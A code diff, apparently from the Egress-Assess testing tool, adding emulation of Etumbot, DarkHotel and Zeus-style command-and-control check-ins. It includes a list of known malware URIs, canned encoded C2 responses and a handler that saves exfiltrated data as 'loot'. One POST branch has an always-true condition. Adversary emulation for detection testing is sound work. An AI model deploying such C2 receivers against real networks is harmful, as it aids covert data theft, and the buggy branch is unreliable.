if (args.client is not None) and (args.datatype is None) and ( if (args.client is not None) and (args.datatype is None) and (
args.file is None): args.file is None):
print "[*] Error: You need to tell Egress-Assess the type \ print "[*] Error: You need to tell Egress-Assess the type \
of data to send!".replace(' ', '') of data to send!".replace(' ', '')
print "[*] Error: to connect to. Please re-run with required info!" print "[*] Error: to connect to. Please re-run with required info!"
sys.exit() sys.exit(1)
if (args.client is None and args.server is None and if (args.client is None and args.server is None and
args.list_servers is None and args.list_clients is None and args.list_servers is None and args.list_clients is None and
@ -95,7 +103,12 @@ def cli_parser():
a server or client!".replace(' ', '') a server or client!".replace(' ', '')
print "[*] Error: Please re-run and provide an action to perform!" print "[*] Error: Please re-run and provide an action to perform!"
parser.print_help() parser.print_help()
sys.exit() sys.exit(1)
if args.actor is not None and args.ip is None:
print "[*] Error: You did not provide an IP to egress data to!"
print "[*] Error: Please re-run and provide an ip!"
sys.exit(1)
return args return args

15
common/orchestra.py
View File

@ -6,6 +6,8 @@ This is the conductor which controls everything
import glob import glob
import imp import imp
from commandcontrol.malware import *
from commandcontrol.apt import *
from protocols.servers import * from protocols.servers import *
from protocols.clients import * from protocols.clients import *
from datatypes import * from datatypes import *
@ -19,6 +21,7 @@ class Conductor:
self.client_protocols = {} self.client_protocols = {}
self.server_protocols = {} self.server_protocols = {}
self.datatypes = {} self.datatypes = {}
self.actor_modules = {}
def load_client_protocols(self, command_line_object): def load_client_protocols(self, command_line_object):
for name in glob.glob('protocols/clients/*.py'): for name in glob.glob('protocols/clients/*.py'):
@ -27,7 +30,6 @@ class Conductor:
self.client_protocols[name] = loaded_client_proto.Client(command_line_object) self.client_protocols[name] = loaded_client_proto.Client(command_line_object)
return return
def load_server_protocols(self, command_line_object): def load_server_protocols(self, command_line_object):
for name in glob.glob('protocols/servers/*.py'): for name in glob.glob('protocols/servers/*.py'):
if name.endswith(".py") and ("__init__" not in name): if name.endswith(".py") and ("__init__" not in name):
@ -41,3 +43,14 @@ class Conductor:
loaded_datatypes = imp.load_source(name.replace("/", ".").rstrip('.py'), name) loaded_datatypes = imp.load_source(name.replace("/", ".").rstrip('.py'), name)
self.datatypes[name] = loaded_datatypes.Datatype(command_line_object) self.datatypes[name] = loaded_datatypes.Datatype(command_line_object)
return return
def load_actors(self, command_line_object):
for name in glob.glob('commandcontrol/malware/*.py'):
if name.endswith(".py") and ("__init__" not in name):
loaded_actors = imp.load_source(name.replace("/", ".").rstrip('.py'), name)
self.actor_modules[name] = loaded_actors.Actor(command_line_object)
for name in glob.glob('commandcontrol/apt/*.py'):
if name.endswith(".py") and ("__init__" not in name):
loaded_actors = imp.load_source(name.replace("/", ".").rstrip('.py'), name)
self.actor_modules[name] = loaded_actors.Actor(command_line_object)
return

10
protocols/clients/https_client.py
View File

@ -4,7 +4,6 @@ This is the web client code
''' '''
import ssl
import sys import sys
import urllib2 import urllib2
@ -24,15 +23,6 @@ class Client:
self.file_transfer = cli_object.file self.file_transfer = cli_object.file
def transmit(self, data_to_transmit): def transmit(self, data_to_transmit):
# This restores the same behavior as before.
try:
_create_unverified_https_context = ssl._create_unverified_context
except AttributeError:
# Legacy Python that doesn't verify HTTPS certificates by default
pass
else:
# Handle target environment that doesn't support HTTPS verification
ssl._create_default_https_context = _create_unverified_https_context
if not self.file_transfer: if not self.file_transfer:
url = "https://" + self.remote_server + "/post_data.php" url = "https://" + self.remote_server + "/post_data.php"

97
protocols/servers/serverlibs/web/base_handler.py
View File

@ -1,7 +1,11 @@
import os import os
import random
import time import time
from BaseHTTPServer import BaseHTTPRequestHandler from BaseHTTPServer import BaseHTTPRequestHandler
from common import helpers from common import helpers
from commandcontrol.apt import *
from commandcontrol.malware import *
from protocols.servers.serverlibs.web import malware_callbacks
class GetHandler(BaseHTTPRequestHandler): class GetHandler(BaseHTTPRequestHandler):
@ -11,20 +15,67 @@ class GetHandler(BaseHTTPRequestHandler):
# should be performing GET requests Help from # should be performing GET requests Help from
# http://pymotw.com/2/BaseHTTPServer/ # http://pymotw.com/2/BaseHTTPServer/
def do_GET(self): def do_GET(self):
if self.path in malware_callbacks.malware_uris:
self.send_response(200)
self.end_headers()
# 404 since we aren't serving up any pages, only receiving data elif self.path == malware_callbacks.etumbot_checkin:
self.send_response(404) self.send_response(200)
self.end_headers() self.end_headers()
self.wfile.write(malware_callbacks.etumbot_checkin_response)
elif ((self.path.startswith(malware_callbacks.etumbot_uri) or self.path.startswith(malware_callbacks.etumbot_uri2)) and (self.path.endswith(malware_callbacks.etumbot_extensions) or self.path.endswith(malware_callbacks.etumbot_extensions2)) or self.path.startswith(malware_callbacks.etumbot_uri3) or self.path.startswith(malware_callbacks.etumbot_uri4) or self.path.startswith(malware_callbacks.etumbot_uri5)):
# current directory
exfil_directory = os.path.join(helpers.ea_path(), "data")
loot_path = exfil_directory + "/"
if not os.path.isdir(loot_path):
os.makedirs(loot_path)
# Get the date info
current_date = time.strftime("%m/%d/%Y")
current_time = time.strftime("%H:%M:%S")
screenshot_name = current_date.replace("/", "") +\
"_" + current_time.replace(":", "") + "actor_data.txt"
with open(loot_path + screenshot_name, 'a') as cc_data_file:
cc_data_file.write('etumbot just checked in here!\n')
self.send_response(200)
self.end_headers()
self.wfile.write(random.choice(malware_callbacks.encoded_response))
elif self.path == malware_callbacks.darkhotel_checkin:
self.send_response(200)
self.end_headers()
self.wfile.write('DEXT8726.168.15.192')
elif self.path == malware_callbacks.darkhotel_checkin2:
self.send_response(200)
self.end_headers()
self.wfile.write('DEXT87no')
elif self.path.startswith(malware_callbacks.darkhotel_uri):
exfil_directory = os.path.join(helpers.ea_path(), "data")
loot_path = exfil_directory + "/"
if not os.path.isdir(loot_path):
os.makedirs(loot_path)
# Get the date info
current_date = time.strftime("%m/%d/%Y")
current_time = time.strftime("%H:%M:%S")
screenshot_name = current_date.replace("/", "") +\
"_" + current_time.replace(":", "") + "actor_data.txt"
with open(loot_path + screenshot_name, 'a') as cc_data_file:
cc_data_file.write('DarkHotel just checked in here!\n')
self.send_response(200)
self.end_headers()
self.wfile.write('DKCheckin good')
else:
# 404 since we aren't serving up any pages, only receiving data
self.send_response(404)
self.end_headers()
return return
# handle post request # handle post request
def do_POST(self): def do_POST(self):
# Gather the Posted URI from the agent/browser
# parsed_path = urlparse.urlparse(self.path)
uri_posted = self.path
uri_posted = uri_posted.replace("/", "")
#incoming_ip = self.client_address[0]
# current directory # current directory
exfil_directory = os.path.join(helpers.ea_path(), "data") exfil_directory = os.path.join(helpers.ea_path(), "data")
loot_path = exfil_directory + "/" loot_path = exfil_directory + "/"
@ -32,7 +83,7 @@ class GetHandler(BaseHTTPRequestHandler):
# Info for this from - # Info for this from -
# http://stackoverflow.com/questions/13146064/simple- # http://stackoverflow.com/questions/13146064/simple-
# python-webserver-to-save-file # python-webserver-to-save-file
if uri_posted == "post_data.php": if self.path == "/post_data.php":
self.send_response(200) self.send_response(200)
self.end_headers() self.end_headers()
@ -56,7 +107,7 @@ class GetHandler(BaseHTTPRequestHandler):
with open(loot_path + screenshot_name, 'a') as cc_data_file: with open(loot_path + screenshot_name, 'a') as cc_data_file:
cc_data_file.write(screen_data) cc_data_file.write(screen_data)
elif uri_posted == "post_file.php": elif self.path == "/post_file.php":
self.send_response(200) self.send_response(200)
self.end_headers() self.end_headers()
@ -75,7 +126,7 @@ class GetHandler(BaseHTTPRequestHandler):
with open(loot_path + file_name, 'wb') as cc_data_file: with open(loot_path + file_name, 'wb') as cc_data_file:
cc_data_file.write(file_data) cc_data_file.write(file_data)
elif uri_posted == "posh_file.php": elif self.path == "/posh_file.php":
self.send_response(200) self.send_response(200)
self.end_headers() self.end_headers()
@ -91,6 +142,30 @@ class GetHandler(BaseHTTPRequestHandler):
with open(loot_path + filename, 'wb') as cc_data_file: with open(loot_path + filename, 'wb') as cc_data_file:
cc_data_file.write(data) cc_data_file.write(data)
elif (self.path in malware_callbacks.malware_uris) or (self.path.startswith(other_uri) for other_uri in malware_callbacks.other_apt_uris):
self.send_response(200)
self.end_headers()
# Check to make sure the agent directory exists, and a loot
# directory for the agent. If not, make them
if not os.path.isdir(loot_path):
os.makedirs(loot_path)
# Get the date info
current_date = time.strftime("%m/%d/%Y")
current_time = time.strftime("%H:%M:%S")
screenshot_name = current_date.replace("/", "") +\
"_" + current_time.replace(":", "") + "actor_data.txt"
# Read the length of the screenshot file being uploaded
screen_length = self.headers['content-length']
screen_data = self.rfile.read(int(screen_length))
# Write out the file
with open(loot_path + screenshot_name, 'a') as cc_data_file:
cc_data_file.write(screen_data)
# All other Post requests # All other Post requests
else: else:

208
protocols/servers/serverlibs/web/malware_callbacks.py Normal file
View File

@ -0,0 +1,208 @@
'''
This file is for managing malware/APT callbacks
'''
malware_uris = [
'/jm32/includes/site/bot.exe', '/jm32/includes/site/config.bin',
'/jm32/includes/site/gate.php', '/mathew/config.jpg',
'/docs/.docs/config.jpg', '/docs/.docs/do.php',
'/zeujuus/a/gate.php', '/zeujuus/a/modules/bot.exe',
'/zeujuus/a/modules/config.bin',
'/zejius/2HZG41Zw/6Vtmo6w4yQ5tnsBHms64.php',
'/zejius/2HZG41Zw/bot.exe',
'/zejius/2HZG41Zw/fJsnC6G4sFg2wsyn4shb.bin',
'/zejius/5GPR0iy9/6Vtmo6w4yQ5tnsBHms64.php',
'/zejius/5GPR0iy9/bot.exe',
'/zejius/5GPR0iy9/fJsnC6G4sFg2wsyn4shb.bin', '/past/config.jpg',
'/past/gate.php', '/fan/base/config.jpg',
'/wp-includes/pomo/panel/config.jpg',
'/wp-includes/pomo/panel/gate.php', '/themes/panel/config.jpg',
'/themes/panel/gate.php', '/home/libraries/joomla/php/gate.php',
'/home/plugins/system/tmp/bot.scr',
'/home/plugins/system/tmp/config.bin',
'/home/plugins/system/tmp/gate.php', '/js/ssj/config.jpg',
'/js/ssj/gate.php', '/site/tmp/xml/config.jpg',
'/site/tmp/xml/gate.php', '/news/wpg.php', '/file.php',
'/.cgi-bin./as.bin', '/wp-content/themes/bmw_lab/new.ban',
'/wp-content/themes/bmw_lab/newnew.wav', '/vs/panel/config.jpg',
'/vs/panel/gate.php', '/brand/server/file.php',
'/brand/server/gate.php',
'/wp-admin/css/colors/sunrise/admin/bot.exe',
'/wp-admin/css/colors/sunrise/admin/config.bin',
'/wp-admin/css/colors/sunrise/admin/secure.php',
'/wp-content/themes/chagim/library/images/plates/bot.exe',
'/wp-content/themes/chagim/library/images/plates/config.bin',
'/wp-content/themes/chagim/library/images/plates/gate.php',
'/images/burr_insurance001001.php', '/images/team/config.jpg',
'/images/team/gate.php', '/test/config.jpg', '/test/gate.php',
'/ray/server/file.php', '/ray/server/gate.php', '/capa.bin',
'/capa.exe', '/secure.php', '/ral/30/config.bin',
'/ral/30/secure.php', '/wp-admin/css/config.bin',
'/wp-admin/css/gate.php', '/wp-admin/css/setup.exe',
'/panel/config.jpg', '/panel/gate.php',
'/wp-includes2/SimplePie/Net/page/config.jpg',
'/wp-includes2/SimplePie/Net/page/gate.php',
'/includes/.srv/srv/bot.exe',
'/includes/.srv/srv/config.bin', '/includes/.srv/srv/gate.php',
'/ric/30/config.bin', '/ric/30/secure.php', '/blog/crea.bin',
'/blog/crea.exe', '/blog/secure.php', '/images2/dave.jpg',
'/images2/gate.php', '/wp-includes/ID3/config.jpg',
'/wp-includes/ID3/gate.php', '/emman/panel/config.jpg',
'/emman/panel/gate.php', '/xampp/img/escu.bin',
'/xampp/img/escu.exe', '/xampp/img/secure.php',
'/.css/config.jpg', '/.css/gate.php', '/admin/cfg.bin',
'/admin/gate.php', '/isai/modules/mod_upgrade/bot.exe',
'/isai/modules/mod_upgrade/config.bin',
'/isai/modules/mod_upgrade/gate.php', '/wp-comment/firs.jpg',
'/wp-comment/gate.php', '/panel/file.php', '/panel/gate.php',
'/images01/fong.bin', '/images01/fong.exe', '/images01/gate.php',
'/img/vg.php', '/components/com_file/file.php',
'/components/com_file/gate.php', '/images/panel/config.jpg',
'/images/panel/gate.php', '/wordpress/gate.php',
'/wordpress/gree.jpg', '/media/.tmp/file.php',
'/media/.tmp/gate.php', '/gate.php', '/modules/holl.bin',
'/modules/holl.exe', '/templates/admin/install/config.jpg',
'/templates/admin/install/gate.php',
'/tmp/admin/install/config.jpg', '/tmp/admin/install/gate.php',
'/tmp/cp/config.jpg', '/tmp/cp/gate.php',
'/tmp/install/config.jpg', '/tmp/install/gate.php',
'/frank/panel/config.jpg', '/frank/panel/gate.php',
'/tmp/configs/new/vg.php', '/meask/lite/file.php',
'/meask/lite/gate.php', '/css/src/admin/config.jpg',
'/css/src/admin/gate.php', '/js/admin/install/config.jpg',
'/js/admin/install/gate.php',
'/wp-content/plugins/wp-db-backup-made/work.php',
'/update/bot.exe', '/update/cfg.bin', '/update/gate.php',
'/chopinschumann/ital.bin', '/chopinschumann/ital.exe',
'/chopinschumann/secure.php', '/images/ital.bin',
'/images/ital.exe', '/images/secure.php',
'/compose/panel/bot.exe', '/compose/panel/config.bin',
'/compose/panel/secure.php', '/fy97/panel/config.bin',
'/fy97/panel/secure.php', '/images/joea.bin', '/images/joea.exe',
'/images/secure.php', '/components/com_joomla/plugin/config.jpg',
'/components/com_joomla/plugin/gate.php',
'/resource/css/config.bin', '/resource/css/secure.php',
'/wp-content/upgrade/PANEL/config.jpg',
'/wp-content/upgrade/PANEL/gate.php',
'/wp-content/plugins/bcet56aoikqf52iu/food.php',
'/Scripts/_notes/build/bot.exe',
'/Scripts/_notes/build/config.bin',
'/Scripts/_notes/build/gate.php', '/REMOVED/.pop/bot.exe',
'/REMOVED/.pop/config.bin', '/REMOVED/.pop/gate.php',
'/KINS/panel/bot.exe', '/KINS/panel/config.jpg',
'/KINS/panel/gate.php', '/panel/config.jpg', '/panel/gate.php',
'/walex/files/bot.exe', '/walex/files/config.jpg',
'/walex/files/gate.php', '/e7/bot.exe', '/e7/cfg.bin',
'/e7/gate.php',
'/wp-admin/css/colors/coffee/cat/server/config.jpg',
'/wp-admin/css/colors/coffee/cat/server/gate.php',
'/site/S/13897652/5112/file.php',
'/site/S/13897652/5112/gate.php',
'/images/js/osomo/panel/config.jpg',
'/images/js/osomo/panel/gate.php',
'/themes/panel/config.jp', '/themes/panel/gate.php',
'/system/eusat/telesa/config.jpg', '/sadcxvbv/vdfbffddf.php',
'/wqwcqqw/sasasacw.php', '/images/server/file.php',
'/images/server/gate.php', '/cache/lcitorg/config.bin',
'/cache/lcitorg/gate.php', '/form/panel/config.jpg',
'/form/panel/gate.php', '/backup/gate.php',
'/backup/jera.jpg', '/images/file.php',
'/images/js/panel/config.jpg', '/images/js/panel/gate.php',
'/images/config.jpg', '/images/gate.php',
'/slim-cita/helps/file.php', '/slim-cita/helps/gate.php',
'/kin/panelz/config.jpg', '/kin/panelz/gate.php',
'/image/Panel/config.jpg', '/folder/config.bin',
'/folder/secure.php', '/plugins/panel/config.jpg',
'/plugins/panel/gate.php',
'/wp-content/plugins/slxcdfrdmn9r0x/j7.php', '/q/gate.php',
'/q/outl.jpg', '/media/k2/file.php', '/media/k2/gate.php',
'/js/MOM/config.jpg', '/js/MOM/gate.php',
'/lung/panel/config.jpg', '/wp/config.jpg',
'/wp/gate.php', '/data/config.jpg', '/data/gate.php',
'/templates/beez/bot.exe', '/templates/beez/config.bin',
'/templates/beez/gate.php', '/wp-includes/css/new/config.jpg',
'/wp-includes/css/new/gate.php',
'/language/pdf_fonts/server/bot.exe',
'/language/pdf_fonts/server/config.bin',
'/language/pdf_fonts/server/gate.php', '/js/liscence.php',
'/js/userslogin.php', '/ijo/config.jpg', '/ijo/gate.php',
'/Mix/valeg/bot.exe', '/Mix/valeg/config.bin',
'/Mix/valeg/gate.php', '/media/media/js/.js/ajax.php',
'/media/media/js/.js/color.jpg', '/wpc/Panel/config.jpg',
'/wpc/Panel/gate.php', '/images/gate.php', '/images/stab.jpg',
'/wpadm/Panel/config.jpg', '/wpadm/Panel/gate.php',
'/admin/b7.php', '/admin/file.php', '/amed/config.jpg',
'/amed/gate.php', '/sadcxvbv/vdfbffddf.php',
'/wpimages/image.php', '/ger/config.jpg', '/ger/gate.php',
'/percy/panel/config.jpg', '/percy/panel/gate.php',
'/map/Icons/outglav.exe', '/map/Icons/Religion/brah.png',
'/map/Icons/Religion/exejfjfjexe.exe', '/images/config.jpg',
'/images/gate.php', '/file.php', '/gate.php', '/.css/config.jpg',
'/.css/gate.php', '/colobus/gate.php', '/colobus/vsam.jpg',
'/news/secure.php', '/news/vuan.bin', '/.id/file.php',
'/.id/gate.php',
'/fast-move/cidphp/file.php', '/fast-move/cidphp/gate.php',
'/overopen/panel/config.bin', '/overopen/panel/secure.php',
'/chromez/config.jpg', '/chromez/gate.php', '/libraries/db.php',
'/sadcxvbv/vdfbffddf.php', '/wqwcqqw/sasasacw.php',
'/wp-comment/baba.jpg', '/wp-comment/gate.php',
'/alumno309/images/base.bin', '/alumno309/images/base.exe',
'/alumno309/images/secure.php',
'/wp-content/plugins/wp-db-backup-made/das.db',
'/ta_images/tools.php', '/plank/panel/config.jpg',
'/includes/database/http/config.jpg',
'/includes/database/http/zin.php', '/wqwcqqw/sasasacw.php',
'/administrator/modules/mod_menu/help/config.jpg',
'/administrator/modules/mod_menu/help/gate.php', '/old/jx36.bin',
'/old/jx36.exe', '/old/secure.php', '/images/icons/bt.exe',
'/images/icons/cfg.bin', '/images/icons/gate.php', '/t/wpg.php',
'/forum.php', '/config.php', '/wp-blog/gate.php',
'/wp-blog/mell.jpg', '/descargas/adm/gate.php',
'/descargas/config/orqu.bin', '/wp-rss.php', '/images/gate.php',
'/images/outl.jpg', '/images/smilies/raye.jpg',
'/images/kin/config.jpg', '/jaextmanager_data/rimm.bin',
'/jaextmanager_data/secure.php', '/js/cssme/file.php',
'/js/cssme/thread.php', '/mss/plugins/system/config.bin',
'/mss/plugins/system/gate.php', '/wp-admin/maint/config.bin',
'/wp-admin/maint/gate.php', '/blog/wp-content/uploads/kim.dot',
'/images/secure.php', '/images/todo.bin', '/images/todo.exe',
'/plugins/system/bot.exe', '/plugins/system/config.bin',
'/plugins/system/gate.php', '/modules/mod_footer/tmpl/file.php',
'/modules/mod_footer/tmpl/gate.php', '/modules/secure.php',
'/modules/warp.bin', '/modules/warp.exe', '/file.php',
'/gate.php', '/db1/config.jpg', '/db1/gate.php',
'/katolog/thumbs/panel/config.jpg',
'/katolog/thumbs/panel/gate.php', '/home/index.asp?typeid=13']
other_apt_uris = [
'/search5', '/microsoft/errorpost/default.aspx?ID=',
'/MicrosoftUpdate/ShellEX/KB', '/MicrosoftUpdate/WWRONG/KB',
'/MicrosoftUpdate/GetFiles/KB', '/MicrosoftUpdate/GetUpdate/KB']
etumbot_checkin = '/home/index.asp/typeid=13'
etumbot_checkin_response = 'AQAAAAAAAABlNjV3YjI0bjUAAAAAAAAAAAAAAG5FAVBvIz8hYk08ITI4BA0lMTBvBRx0NB18BndMcFMKQhR5PxxkQ3VnFEALeXA6C3RPBmJLHBBccHQINEl9I3kMUk0lOT4wCFgqD3khTjl5IEAqGzU_DmtUeEJBYSQHEiwRADteMEFjTw5oXgtjGkUxL14JPlwyYQQXPkVaQiAyUBEaJWlkOQEmZRoXZ10EN3RndH0kbEErew0NUklhFRlpNDJofS1hPQMCeWUvHSQPA2ZAPHEcCRkLPURbCC8bdTgIXXcIBhBbVlhjdB8iL2Y_TCNldTNjZkEvB0M5BWtaOkBALj4KIA5UBjhVPxhhSk1fAwdKKi8zdhl6TkthRUZAOQdICRgFEgY0dwpQNjtlQgR8DzM9N3NQBhteHgdwaVtycDZvS1Q3CTYhARI1GBMrWh1FQxcdQhV7MSx'
etumbot_uri = '/history/'
etumbot_uri2 = '/image/'
etumbot_uri3 = '/article/30441/Review.asp?'
etumbot_uri4 = '/manage/asp/item.asp?id='
etumbot_uri5 = '/tech/s.asp?m='
etumbot_extensions = '.jpg'
etumbot_extensions2 = '.asp'
encoded_response = [
'dGhpc2lzZ29pbmd0b2JlIGEgcmVhbGx5IGJpZyByZXNwb25zZSBob3BlZnVsbHkuICBXZSByZWFsbHkgd2FudCB0aGVyZSB0byBiZSBhIGxvdCBvZiBkYXRhIHNvIHRoYXQgSSBjYW4gc2ltbGF0ZSB0aGUgd2ViIHJlc3BvbnNlIGJlaW5nIEMyIGNvbW1hbmRzIGZyb20gdGhlIHV0dW1ib3Qgc2VydmVyLiAgSSBkbyBub3Qga25vdyB3aGF0IGlzIGdvaW5nIHRvIGhhcHBlbiwgYnV0IEkgd2lsbCBjb250aW51ZSB0byB0cnkgdG8gZGV2ZWxvcCBhIGxvdCBvZiBtYWx3YXJlIG1vZHVsZSBmb3IgZWdyZXNzLWFzc2Vzcy4gIGl0IGhhcyBiZWVuIGEgbG90IG9mIGZ1bg--',
'SSBhbSBnb2luZyB0byBjb250aW51ZSB0byBkZXZlbG9wIGVncmVzcy1hc3Nlc3MgbW9kdWxlcyBhbmQgdGhpcyBpcyBnb2luZyB0byBiZSBvbmUgb2YgdGhlbS4gIFRoZSBpbml0aWFsIHJlbGVhc2UgZm9yIHRoZXNlIG1hbHdhcmUgYW5kIEFQVCBncm91cCBtb2R1bGVzIGlzIGdvaW5nIHRvIGJlIGF0IFNBTlMgSEFDS0ZFU1QgaW4gd2FzaGluZ3RvbiBEQy4gIElmIHlvdSBhcmUgd2FudGluZyB0byBnZXQgdGhlIGxhdGVzdCBlZ3Jlc3MtYXNzZXNzIG1vZHVsZXMgdGhlIGVhcmxpZXN0IHRoYXQgeW91IGNhbiwgYmUgc3VyZSB0byBnZXQgdGhlcmUgYXQgSEFDS0ZFU1QgYW5kIHNlZSBzdGV2ZSBhbmQgSSB0YWxrLg--',
'U3RldmUgaXMgdGhlIG1hbiwgYW5kIGhhcyBiZWVuIGdyZWF0IHRvIHdvcmsgd2l0aCBvbiBFZ3Jlc3MtQXNzZXNzLiAgSGUgd2FzIGFjdHVhbGx5IHRoZSBvbmUgd2hvIGNhbWUgdXAgd2l0aCB0aGUgaWRlYSBvZiBoYXZpbmcgdXMgZW11bGF0ZSBkaWZmZXJlbnQgcGllY2VzIG9mIG1hbHdhcmUgb3IgaGFja2luZyBncm91cHMuICBXZSB0YWxrZWQgYWJvdXQgaXQgYW5kIHRob3VnaHQgaXQgd2FzIGEgZ3JlYXQgaWRlYSwgc28gaGVyZSB3ZSBhcmUh',
'VGhpcyBpcyBwcm9iYWJseSB0aGUgY2xvc2VzdCB0aGluZyB0byBhbiBlYXN0ZXIgZWdnIHRoYXQgd2UgaGF2ZSBjdXJyZW50bHkgaW4gRWdyZXNzLUFzc2Vzcy4gIFRoZXJlIGlzIG5vdCBhIGxvdCBvZiBvdGhlciBhcmVhcyB3aGVyZSBhbnl0aGluZyBjb3VsZCByZWFsbHkgYmUgaGlkZGVuIHdpdGhpbiB0aGlzIHByb2dyYW0sIGJ1dCBpdCB3b3VsZCBiZSBraW5kIG9mIGZ1bm55IHRvIGhlYXIgaWYgYW55b25lIGVsc2UgYWN0dWFsbHkgZmluZHMgdGhpcyBkYXRhLg--',
'T25lIHRoaW5nIHRoYXQgSSBkZWZpbml0ZWx5IGhhdmUgbGVhcm5lZCBpcyB0aGF0IGl0IGlzIGhhcmQgdG8gd29yayBvbiB3cml0aW5nIGRpZmZlcmVudCBzb2Z0d2FyZSBhbmQgaGF2ZSB0d28ga2lkcyBhdCB0aGUgc2FtZSB0aW1lLiAgSG9wZWZ1bGx5IEkgd2lsbCBiZSBhYmxlIHRvIGRvIHRoaXMsIGJ1dCBpdCB3aWxsIGJlIGEgbG90IGZhc3RlciBvbmNlIHRoZSBraWRzIGdldCBhIGxpdHRsZSBiaXQgb2xkZXIgYW5kIEkgY2FuIHRoZW4gc3BlbmQgbW9yZSB0aW1lIG9uIHRoaXMu',
'U28gZmFyLCB3ZSBkbyBub3QgYWN0dWFsbHkgaGF2ZSBhbnlvbmUgdGhhdCBoYXMgc3VibWl0dGVkIGFueSBwdWxsIHJlcXVlc3RzIHRvIEVncmVzcy1Bc3Nlc3MuICBXZSBkZWZpbml0ZWx5IHRoaW5rIGl0IHdvdWxkIGJlIGF3ZXNvbWUgaWYgc29tZW9uZSBlbHNlIGFkZGVkIHNvbWUgZmVhdHVyZXMgdG8gRWdyZXNzLUFzc2Vzcywgb3Igc2VuZCB1cyBtb2R1bGVzIHNvIHRoYXQgd2UgY2FuIGdldCBpdCBhZGRlZCBpbiB0byB0aGUgdG9vbCE-',
'VGhpcyB3aWxsIG1ha2UgbGlmZSBlYXN5LCBob3BlZnVsbHkgZXZlcnlvbmUgaXMgYWJsZSB0byB1c2UgdGhpcyB0b29sIHRvIHRlc3QgaWYgdGhlaXIgbmV0d29ya3MgYWN0dWFsbHkgY2F0Y2ggYW55IG9mIHRoZSBkYXRhIGxlYXZpbmcgdGhlaXIgbmV0d29yaywgb3IgYW55IG9mIHRoZSBwaWVjZXMgb2YgbWFsd2FyZSBvcGVyYXRpbmcgd2l0aGluIHRoZWlyIG5ldHdvcmsuICBZb3Ugc2hvdWxkIGFsbCB0ZXN0IGl0IG91dCBhbmQgc2VlIGlmIHlvdSBjYW4gY2F0Y2ggdGhpcyE-',
'V2VsbCB0aGlzIGlzIGdvaW5nIHRvIGJlIHRoZSBsYXN0IGV0dW1ib3QgcmVzcG9uc2UgZm9yIG5vdy4gIElmIHNvbWVvbmUgZWxzZSBpcyBhY3R1YWxseSByZWFkaW5nIHRoZXNlLCB5b3Ugc2hvdWxkIGRlbW9uc3RyYXRlIHRoYXQgeW91IGhhdmUgcmVhZCB0aGVzZSBieSBhZGRpbmcgYSByZXNwb25zZSBzcGVjaWZpY2FsbHkgdGhpcyBldHVtYm90IHJlc3BvbnNlcy4gIEl0IHdpbGwgYmUgdGhpcyBsaXR0bGUgZWFzdGVyZWdnIDop',
'SSB3b3VsZCByZWFsbHkgbGlrZSB0byB0aGluayB0aGF0IGF0IHNvbWUgcG9pbnQgSSBoYXZlIGdlbmVyYXRlZCBlbm91Z2ggb2YgdGhlc2UgZW5jb2RlZCBtb2R1bGVzLiAgSW4gdGhlIG1lYW50aW1lLCBzb21lIGZpbGxlciEgIFlvdSBndXlzIHNob3VsZCBiZSBzdXJlIHRvIGdvIHZpc2l0IG15IHdlYiBwYWdlIGF0IGNocmlzdG9waGVydHJ1bmNlci5jb20gYmVjYXVzZSBJIHRyeSB0byB3cml0ZSBzb21lIHVzZWZ1bCBhcnRpY2xlcyB0aGVyZSB0aGF0IGhlbHAgb3RoZXJzIGluIHRoZSBjb21tdW5pdHkh',
'QW5kIHRoaXMgaXMgYWN0dWFsbHkgdGhlIGxhc3Qgb25lIHRoYXQgSSBhbSBtYWtpbmcuICBJZiB5b3UgZ3V5cyB3YW50IHRvIGxlYXJuIGhvdyB0byBieXBhc3MgYW50aXZpcnVzLCBlc3BlY2lhbGx5IHNpbmNlIGl0IHJlYWxseSBpcyBqdXN0IGEgam9rZSwgeW91IHNob3VsZCBiZSBzdXJlIHRvIHBsYXkgYXJvdW5kIHdpdGggVmVpbC1FdmFzaW9uIGFuZCBsZWFybiBob3cgdG8gdXNlIGl0IGF0IHZlaWwtZnJhbWV3b3JrLmNvbS4gIEkgaG9wZSB0aGF0IHRoYXQgaGVscHMh']
darkhotel_checkin = '/major/images/view.php'
darkhotel_checkin2 = '/major/txt/read.php'
darkhotel_uri = '/bin/read_i.php?a1='